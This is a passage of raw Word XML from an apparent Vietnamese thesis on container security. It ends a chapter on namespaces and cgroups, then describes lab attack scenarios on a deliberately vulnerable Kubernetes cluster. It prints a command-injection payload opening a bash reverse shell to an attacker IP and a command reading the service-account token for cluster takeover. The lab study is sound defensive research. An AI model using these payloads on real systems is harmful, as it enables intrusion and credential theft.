        <w:t>Trong khi Namespaces thực hiện nhiệm vụ cô lập không gian hoạt động, cgroups đóng vai trò kiểm soát, giới hạn và phân phối tài nguyên phần cứng vật lý mà một container được phép tiêu thụ. cgroups thiết lập các hạn ngạch (quotas) nghiêm ngặt đối với:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F9FACA9" w14:textId="77777777" w:rsidR="009D772B" w:rsidRPr="00482F63" w:rsidRDefault="009D772B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00482F63">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bộ xử lý (CPU):</w:t>
      </w:r>
      <w:r w:rsidRPr="00482F63">
        <w:t xml:space="preserve"> Giới hạn tỷ lệ phần trăm chu kỳ xử lý hoặc ấn định các lõi nhân cụ thể cho container.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BAFD0DF" w14:textId="77777777" w:rsidR="009D772B" w:rsidRPr="00482F63" w:rsidRDefault="009D772B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00482F63">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Bộ nhớ (RAM):</w:t>
      </w:r>
      <w:r w:rsidRPr="00482F63">
        <w:t xml:space="preserve"> Thiết lập ngưỡng dung lượng RAM tối đa. Nếu container vượt quá giới hạn cấu hình, cơ chế bảo vệ của hệ điều hành sẽ tự động can thiệp để tránh gây ảnh hưởng đến tính ổn định của máy chủ host.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02ECD00F" w14:textId="77777777" w:rsidR="009D772B" w:rsidRPr="00482F63" w:rsidRDefault="009D772B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00482F63">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Băng thông lưu trữ và mạng (I/O &amp; Network):</w:t>
      </w:r>
      <w:r w:rsidRPr="00482F63">
        <w:t xml:space="preserve"> Giới hạn tốc độ đọc/ghi dữ liệu lên ổ đĩa và tốc độ truyền tải gói tin qua mạng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="432EA069" w14:textId="6B57EAB5" w:rsidR="00026BE1" w:rsidRPr="009E0111" w:rsidRDefault="00FC61AA" w:rsidP="009E0111">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="_Toc235976352"/>
      <w:r w:rsidRPr="009E0111">
        <w:t>Kết luận chương</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
    </w:p>
    <w:p w14:paraId="13F8B70A" w14:textId="3FCFF4A0" w:rsidR="00FC61AA" w:rsidRPr="009823E1" w:rsidRDefault="00FC61AA" w:rsidP="00FC61AA">
      <w:r w:rsidRPr="009823E1">
        <w:t>Container được thiết lập dựa trên sự kết hợp giữa các cơ chế nguyên bản của nhân Linux (Linux kernel primitives) — trọng tâm là không gian tên (Namespaces) và nhóm kiểm soát (cgroups) — nhằm tạo ra các môi trường thực thi độc lập và được kiểm soát chặt chẽ về mặt tài nguyên. Trong khi Namespaces cung cấp cho container các góc nhìn logic biệt lập đối với tài nguyên hệ thống (bao gồm định danh tiến trình PID, giao diện mạng và các điểm gắn kết hệ thống tệp) để phân chia tài nguyên toàn cục của nhân thành các thực thể riêng biệt, thì cgroups chịu trách nhiệm áp đặt các hạn ngạch và quyền ưu tiên đối với CPU, bộ nhớ, băng thông I/O cùng các thành phần hệ thống cốt lõi khác, đảm bảo các container luôn vận hành trong phạm vi tài nguyên được cấp phát.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6195B530" w14:textId="5B1A10F3" w:rsidR="00FC61AA" w:rsidRPr="009823E1" w:rsidRDefault="00FC61AA" w:rsidP="00FC61AA">
      <w:r w:rsidRPr="009823E1">
        <w:t>Các trình thực thi container (Container Runtimes) như Docker hay LXC đóng vai trò là lớp quản lý trung gian để điều phối quy trình khởi tạo, cấu hình và quản lý vòng đời của hệ thống Namespaces và cgroups trên từng container. Thông qua việc gọi các cuộc gọi hệ thống của nhân Linux bao gồm clone(), unshare(), và setns(), các trình thực thi này thiết lập các không gian tên tương ứng và gắn kết các tiến trình vào những nhóm cgroups liên quan. Bên cạnh đó, lớp runtime này còn đảm nhiệm chức năng quản lý tệp tin ảnh (Container Image), thiết lập cấu trúc mạng nội bộ và giám sát tài nguyên, cung cấp một giao diện tối ưu cho việc triển khai các ứng dụng container hóa.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BDFC973" w14:textId="234956A6" w:rsidR="00FC61AA" w:rsidRPr="009823E1" w:rsidRDefault="00FC61AA" w:rsidP="00FC61AA">
      <w:r w:rsidRPr="009823E1">
        <w:t xml:space="preserve">Trái ngược với kiến trúc máy ảo truyền thống dựa trên lớp giám sát (Hypervisor-based VMs) vốn phải mô phỏng phần cứng và vận hành các hệ điều hành khách (Guest OS) biệt lập, các container dùng chung nhân của hệ điều hành máy chủ (Host </w:t>
      </w:r>
      <w:r w:rsidRPr="009823E1">
        <w:lastRenderedPageBreak/>
        <w:t>OS Kernel) và thực hiện cô lập các tiến trình ở cấp độ hệ điều hành (OS-level isolation). Sự khác biệt cốt lõi về mặt kiến trúc này giúp container giảm thiểu đáng kể chi phí tiêu thụ tài nguyên hao phí (overhead) và tối ưu hóa tốc độ khởi động dịch vụ. Mặc dù các Hypervisor mang lại khả năng cô lập kiên cố hơn nhờ việc thiết lập các ranh giới nhân độc lập, chúng lại gây ra độ trễ hệ thống và tiêu tốn nhiều CPU, bộ nhớ cũng như dung lượng lưu trữ hơn do phải ảo hóa toàn diện cả hệ điều hành.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66D0E143" w14:textId="77777777" w:rsidR="00FC61AA" w:rsidRPr="009823E1" w:rsidRDefault="00FC61AA" w:rsidP="00FC61AA">
      <w:r w:rsidRPr="009823E1">
        <w:t xml:space="preserve">Ưu thế vượt trội của mô hình container bao gồm khả năng cô lập gọn nhẹ, tốc độ khởi tạo nhanh chóng và hiệu suất sử dụng tài nguyên tối ưu, biến đây trở thành giải pháp lý tưởng cho kiến trúc vi dịch vụ (Microservices) và các ứng dụng thuần đám mây (Cloud-native applications). Tuy nhiên, công nghệ này vẫn tồn tại những giới hạn nhất định về mặt an ninh bảo mật; việc dùng chung nhân hệ điều hành với máy chủ vật lý vô tình mở rộng bề mặt tấn công (Attack Surface) lớn hơn so với máy ảo. Ngoài ra, các lỗ hổng tầng nhân hoặc các sai sót trong cấu hình hệ thống đều tiềm ẩn nguy cơ phá vỡ ranh giới cô lập an toàn của container. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB2A156" w14:textId="77777777" w:rsidR="00FC61AA" w:rsidRPr="009823E1" w:rsidRDefault="00FC61AA">
      <w:pPr>
        <w:spacing w:before="0" w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="009823E1">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C576B7" w14:textId="77777777" w:rsidR="001B00BF" w:rsidRPr="00B3514A" w:rsidRDefault="001B00BF" w:rsidP="001B00BF">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="_Hlk236002666"/>
      <w:bookmarkStart w:id="23" w:name="_Toc235976354"/>
      <w:r w:rsidRPr="00B3514A">
        <w:lastRenderedPageBreak/>
        <w:t>THỰC NGHIỆM PHƯƠNG THỨC TẤN CÔNG VÀ PHÂN TÍCH VÉC-TƠ XÂM NHẬP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59683148" w14:textId="77777777" w:rsidR="001B00BF" w:rsidRDefault="001B00BF" w:rsidP="001B00BF">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="_Toc233498101"/>
      <w:bookmarkEnd w:id="22"/>
      <w:r w:rsidRPr="009E0111">
        <w:t>Giới thiệu chương</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:p w14:paraId="0D377917" w14:textId="77777777" w:rsidR="001B00BF" w:rsidRPr="00491C76" w:rsidRDefault="001B00BF" w:rsidP="001B00BF">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00491C76">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Chương 3 xây dựng môi trường phòng thí nghiệm thực tế để thực hiện các kịch bản tấn công giả định (PoC), bao gồm: thoát chuồng chiếm quyền Host, đánh cắp định danh Service Account và nghe lén mạng nội bộ.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00491C76">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Kết quả từ các thực nghiệm này là cơ sở thực tế quan trọng để phát triển các giải pháp phòng thủ toàn diện trong chương tiếp theo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="242D2A58" w14:textId="77777777" w:rsidR="001B00BF" w:rsidRPr="009E0111" w:rsidRDefault="001B00BF" w:rsidP="001B00BF">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="_Toc233498102"/>
      <w:r w:rsidRPr="009E0111">
        <w:t>Thiết lập Môi trường Thực nghiệm</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
    </w:p>
    <w:p w14:paraId="73BE3447" w14:textId="77777777" w:rsidR="001B00BF" w:rsidRDefault="001B00BF" w:rsidP="001B00BF">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5AFE2316" wp14:editId="6294E812">
            <wp:extent cx="1972101" cy="2606821"/>
            <wp:effectExtent l="0" t="0" r="9525" b="3175"/>
            <wp:docPr id="1186630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8731" cy="2628803"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E87E7A" w14:textId="5916D265" w:rsidR="001B00BF" w:rsidRDefault="001B00BF" w:rsidP="001B00BF">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="26" w:name="_Toc233498142"/>
      <w:r>
        <w:t xml:space="preserve">Hình </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Hình \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00835A55">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00482F63">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Mô hình thực nghiệm</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
    </w:p>
    <w:p w14:paraId="0C4903BD" w14:textId="77777777" w:rsidR="001B00BF" w:rsidRPr="00DC5DB2" w:rsidRDefault="001B00BF" w:rsidP="001B00BF">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC5DB2">
        <w:t>Môi trường phòng thí nghiệm gồm cụm Kubernetes (Ubuntu 22.04, containerd v1.7) triển khai ứng dụng Microservices giả lập thương mại điện tử với lỗ hổng Command Injection cố ý. Máy tấn công sử dụng hệ điều hành Kali Linux cùng dải mạng nội bộ, được trang bị đầy đủ các công cụ kiểm thử như Nmap, Burp Suite và Kubectl .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68210EF9" w14:textId="77777777" w:rsidR="001B00BF" w:rsidRDefault="001B00BF" w:rsidP="001B00BF">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0597D5A8" wp14:editId="2CEC3CB7">
            <wp:extent cx="5218368" cy="1821976"/>
            <wp:effectExtent l="0" t="0" r="1905" b="6985"/>
            <wp:docPr id="6945725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26953" cy="1824973"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="574851D4" w14:textId="421C1911" w:rsidR="001B00BF" w:rsidRPr="00C32400" w:rsidRDefault="001B00BF" w:rsidP="001B00BF">
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
      <w:bookmarkStart w:id="27" w:name="_Toc233498143"/>
      <w:r>
        <w:t xml:space="preserve">Hình </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Hình \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00835A55">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>11</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="008D58A8">
        <w:t>. Sơ đồ luồng thực nghiệm</w:t>
      </w:r>
      <w:bookmarkEnd w:id="27"/>
    </w:p>
    <w:p w14:paraId="0C781706" w14:textId="77777777" w:rsidR="001B00BF" w:rsidRPr="009E0111" w:rsidRDefault="001B00BF" w:rsidP="001B00BF">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="28" w:name="_Toc233498103"/>
      <w:r w:rsidRPr="009E0111">
        <w:t>Kịch bản TN-01: Tấn công thoát chuồng (Container Escape) qua cấu hình sai Đặc quyền</w:t>
      </w:r>
      <w:bookmarkEnd w:id="28"/>
    </w:p>
    <w:p w14:paraId="7617EEF5" w14:textId="77777777" w:rsidR="001B00BF" w:rsidRPr="009E0111" w:rsidRDefault="001B00BF" w:rsidP="001B00BF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="29" w:name="_Toc233498104"/>
      <w:r w:rsidRPr="009E0111">
        <w:t>Mục tiêu</w:t>
      </w:r>
      <w:bookmarkEnd w:id="29"/>
    </w:p>
    <w:p w14:paraId="0F372C89" w14:textId="77777777" w:rsidR="001B00BF" w:rsidRPr="009823E1" w:rsidRDefault="001B00BF" w:rsidP="001B00BF">
      <w:r w:rsidRPr="009823E1">
        <w:t>Từ quyền truy cập ban đầu thu được bên trong container Frontend, kẻ tấn công bẻ gãy ranh giới cô lập để nhảy ra ngoài (Escape), chiếm quyền điều khiển đặc quyền root trực tiếp trên hệ điều hành của máy chủ host vật lý (worker01).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B43D3D" w14:textId="77777777" w:rsidR="001B00BF" w:rsidRPr="00DC5DB2" w:rsidRDefault="001B00BF" w:rsidP="001B00BF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="30" w:name="_Toc233498105"/>
      <w:r w:rsidRPr="009E0111">
        <w:t>Điều kiện kích hoạt lỗi</w:t>
      </w:r>
      <w:bookmarkEnd w:id="30"/>
    </w:p>
    <w:p w14:paraId="679E3336" w14:textId="77777777" w:rsidR="001B00BF" w:rsidRPr="00E706D1" w:rsidRDefault="001B00BF" w:rsidP="001B00BF">
      <w:r w:rsidRPr="00DC5DB2">
        <w:t>Quản trị viên cấu hình sai lầm nghiêm trọng trong file deployment khi kích hoạt chế độ siêu đặc quyền (privileged: true) cho container</w:t>
      </w:r>
      <w:r w:rsidRPr="00E706D1">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B1F8798" w14:textId="77777777" w:rsidR="001B00BF" w:rsidRPr="009E0111" w:rsidRDefault="001B00BF" w:rsidP="001B00BF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="31" w:name="_Toc233498106"/>
      <w:r w:rsidRPr="009E0111">
        <w:t>Quy trình thực hiện chi tiết</w:t>
      </w:r>
      <w:bookmarkEnd w:id="31"/>
    </w:p>
    <w:p w14:paraId="43A1980D" w14:textId="77777777" w:rsidR="001B00BF" w:rsidRPr="00671F8E" w:rsidRDefault="001B00BF" w:rsidP="001B00BF">
      <w:r w:rsidRPr="009823E1">
        <w:t xml:space="preserve">Thông qua giao diện Web mục tiêu tại cổng 30080, kẻ tấn công tiêm chuỗi payload độc hại vào ô URL:Plaintexthttps://google.com'; bash -c 'bash -i &gt;&amp; /dev/tcp/10.15.xx.173/4444 0&gt;&amp;1'; '. </w:t>
      </w:r>
      <w:r w:rsidRPr="00E706D1">
        <w:t>Trong đó 10.15.xx.173 là địa chỉ của máy hacker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29530FA7" w14:textId="77777777" w:rsidR="001B00BF" w:rsidRPr="00671F8E" w:rsidRDefault="001B00BF" w:rsidP="001B00BF">
      <w:r w:rsidRPr="00671F8E">
        <w:t xml:space="preserve">Hệ thống backend thực thi ngầm qua hàm </w:t>
      </w:r>
      <w:r w:rsidRPr="00671F8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>os.popen()</w:t>
      </w:r>
      <w:r w:rsidRPr="00671F8E">
        <w:t xml:space="preserve">, trả về một phiên shell tương tác </w:t>
      </w:r>
      <w:r w:rsidRPr="00671F8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>root@web-frontend-xxx:/#</w:t>
      </w:r>
      <w:r w:rsidRPr="00671F8E">
        <w:t xml:space="preserve"> về cho máy Kali.Kiểm tra năng lực đặc quyền (Capabilities Check): Tại shell vừa chiếm được, kẻ tấn công kiểm tra quyền bằng lệnh: capsh --print</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="728C46D7" w14:textId="77777777" w:rsidR="001B00BF" w:rsidRDefault="001B00BF" w:rsidP="001B00BF">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D58A8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Kết quả hiển thị quyền </w:t>
      </w:r>
      <w:r w:rsidRPr="001A486E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cap_sys_admin</w:t>
      </w:r>
      <w:r w:rsidRPr="008D58A8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> và </w:t>
      </w:r>
      <w:r w:rsidRPr="001A486E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cap_sys_rawio</w:t>
      </w:r>
      <w:r w:rsidRPr="008D58A8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001A486E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>$\rightarrow$</w:t>
      </w:r>
      <w:r w:rsidRPr="008D58A8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A86A9C2" w14:textId="77777777" w:rsidR="001B00BF" w:rsidRDefault="001B00BF" w:rsidP="001B00BF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="32" w:name="_Toc233498107"/>
      <w:r w:rsidRPr="009E0111">
        <w:lastRenderedPageBreak/>
        <w:t>Kết quả thực nghiệm đạt được</w:t>
      </w:r>
      <w:bookmarkEnd w:id="32"/>
    </w:p>
    <w:p w14:paraId="6B2B307F" w14:textId="77777777" w:rsidR="001B00BF" w:rsidRPr="00FA4830" w:rsidRDefault="001B00BF" w:rsidP="001B00BF">
      <w:r w:rsidRPr="0043452B">
        <w:t>Ngay sau khi lệnh chroot thực thi, không gian gốc của container bị phá vỡ hoàn toàn. Để chứng minh hành vi thoát chuồng chiếm quyền máy chủ vật lý thành công</w:t>
      </w:r>
      <w:r w:rsidRPr="00E706D1">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F05ABD" w14:textId="77777777" w:rsidR="001B00BF" w:rsidRPr="00E706D1" w:rsidRDefault="001B00BF" w:rsidP="001B00BF">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Heading2Char"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E706D1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="33" w:name="_Toc233498108"/>
      <w:r w:rsidRPr="00E706D1">
        <w:rPr>
          <w:rStyle w:val="Heading2Char"/>
          <w:b/>
        </w:rPr>
        <w:t>Kịch bản TN-02: Đánh cắp Service Account Token để chiếm quyền cụm Kubernetes</w:t>
      </w:r>
      <w:bookmarkEnd w:id="33"/>
    </w:p>
    <w:p w14:paraId="09D6065D" w14:textId="77777777" w:rsidR="001B00BF" w:rsidRPr="00D64E0A" w:rsidRDefault="001B00BF" w:rsidP="001B00BF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="34" w:name="_Toc233498109"/>
      <w:r w:rsidRPr="00D64E0A">
        <w:t>Mục tiêu</w:t>
      </w:r>
      <w:bookmarkEnd w:id="34"/>
    </w:p>
    <w:p w14:paraId="72BEE171" w14:textId="77777777" w:rsidR="001B00BF" w:rsidRPr="009823E1" w:rsidRDefault="001B00BF" w:rsidP="001B00BF">
      <w:r w:rsidRPr="009823E1">
        <w:t>Lợi dụng Token định danh (ServiceAccount) được gắn mặc định trong Pod Frontend để chiếm quyền quản trị tối cao (Cluster Admin) của toàn bộ cụm máy chủ K3s từ xa.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FDBAD14" w14:textId="77777777" w:rsidR="001B00BF" w:rsidRPr="00D64E0A" w:rsidRDefault="001B00BF" w:rsidP="001B00BF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="35" w:name="_Toc233498110"/>
      <w:r w:rsidRPr="00D64E0A">
        <w:t>Điều kiện kích hoạt lỗi</w:t>
      </w:r>
      <w:bookmarkEnd w:id="35"/>
    </w:p>
    <w:p w14:paraId="498BAA03" w14:textId="77777777" w:rsidR="001B00BF" w:rsidRPr="00E706D1" w:rsidRDefault="001B00BF" w:rsidP="001B00BF">
      <w:r w:rsidRPr="009823E1">
        <w:t>Quản trị viên liên kết tài khoản dịch vụ của Pod Frontend với quyền Admin của toàn cụm thông qua một ClusterRoleBinding quá lỏng</w:t>
      </w:r>
      <w:r w:rsidRPr="00E706D1">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E061573" w14:textId="77777777" w:rsidR="001B00BF" w:rsidRPr="00D64E0A" w:rsidRDefault="001B00BF" w:rsidP="001B00BF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="36" w:name="_Toc233498111"/>
      <w:r w:rsidRPr="00D64E0A">
        <w:t>Quy trình thực hiện chi tiết</w:t>
      </w:r>
      <w:bookmarkEnd w:id="36"/>
    </w:p>
    <w:p w14:paraId="1A71A6E2" w14:textId="77777777" w:rsidR="001B00BF" w:rsidRPr="009823E1" w:rsidRDefault="001B00BF" w:rsidP="001B00BF">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="009823E1">
        <w:t xml:space="preserve">    Khai thác và Đánh cắp Token mật: Kẻ tấn công sử dụng phiên shell chiếm được từ lỗi Command Injection ở TN-01, truy cập vào đường dẫn lưu trữ token nội bộ của Kubernetes để trích xuất khóa cấu hình:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8780"/>
      </w:tblGrid>
      <w:tr w:rsidR="001B00BF" w14:paraId="6D0EB7E3" w14:textId="77777777" w:rsidTr="001B2026">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8780" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="151BF83B" w14:textId="77777777" w:rsidR="001B00BF" w:rsidRPr="00C32400" w:rsidRDefault="001B00BF" w:rsidP="001B2026">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C32400">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
              </w:rPr>
              <w:t>cat /var/run/secrets/kubernetes.io/serviceaccount/token</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="68B1721A" w14:textId="77777777" w:rsidR="001B00BF" w:rsidRDefault="001B00BF" w:rsidP="001B00BF">
      <w:pPr>
        <w:keepNext/>
        <w:ind w:hanging="142"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00690E86">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7DE1F22C" wp14:editId="60147CF1">
            <wp:extent cx="5830668" cy="609600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1127191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6594" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId22"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5837164" cy="610279"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
